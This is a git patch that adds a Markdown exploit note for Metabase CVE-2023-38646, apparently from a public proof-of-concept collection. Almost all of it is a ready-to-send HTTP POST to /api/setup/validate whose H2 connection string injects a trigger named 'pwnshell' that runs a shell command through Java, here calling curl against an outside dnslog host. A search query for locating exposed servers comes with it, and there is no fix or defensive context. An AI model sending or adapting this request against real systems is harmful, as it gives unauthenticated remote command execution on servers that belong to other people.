From 4e86d354bef6ba23fdab247985f8eb05674adba0 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 20 Aug 2023 10:04:43 +0800
Subject: [PATCH] =?UTF-8?q?Create=20Metabase=20validate=20=E8=BF=9C?=
 =?UTF-8?q?=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?=EF=BC=88CVE-2023-38646=EF=BC=89.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...date 远程命令执行漏洞（CVE-2023-38646）.md | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 Metabase validate 远程命令执行漏洞（CVE-2023-38646）.md

diff --git a/Metabase validate 远程命令执行漏洞（CVE-2023-38646）.md b/Metabase validate 远程命令执行漏洞（CVE-2023-38646）.md
new file mode 100644
index 0000000..b754759
--- /dev/null
+++ b/Metabase validate 远程命令执行漏洞（CVE-2023-38646）.md	
@@ -0,0 +1,35 @@
+## Metabase validate 远程命令执行漏洞（CVE-2023-38646）
+网络测绘
+app=“元数据库” 
+
+/api/session/properties
+```
+POST /api/setup/validate HTTP/1.1
+Host: 
+Content-Type: application/json
+Content-Length: 812
+
+{
+    "token": "e56e2c0f-71bf-4e15-9879-d964f319be69",
+    "details":
+    {
+        "is_on_demand": false,
+        "is_full_sync": false,
+        "is_sample": false,
+        "cache_ttl": null,
+        "refingerprint": false,
+        "auto_run_queries": true,
+        "schedules":
+        {},
+        "details":
+        {
+            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl ecw14d.dnslog.cn')\n$$--=x",
+            "advanced-options": false,
+            "ssl": true
+        },
+        "name": "an-sec-research-team",
+        "engine": "h2"
+    }
+}
+
+```